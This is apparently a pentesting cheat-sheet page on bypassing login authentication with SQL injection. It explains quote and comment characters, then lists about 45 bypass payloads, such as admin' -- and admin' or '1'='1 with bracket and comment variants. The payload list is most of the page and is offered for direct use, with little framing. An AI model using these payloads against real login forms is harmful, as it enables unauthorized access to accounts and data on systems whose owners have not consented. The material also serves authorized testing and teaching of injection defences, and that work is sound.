Bypass Authentication

The best place to start with SQL injection is at the login page for users or administrators. Every login is reliant on a database for validating the username and password. If the page and backend system do not sanitize the input data properly and construct the SQL queries, then the login process can be bypassed.

Some of the characters used in a SQL query to keep in mind,

' - Enclosing a string

" - Enclosing a string

"#" - The hash indicates a comment and all characters after it are ignored

"--" - The double dashes indicates a comment and all characters after it are ignored

/* - The combinations indicates a comment and all characters after it are ignored

Now, with all these characters its a matter of combination to trick the backend system.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*

Last updated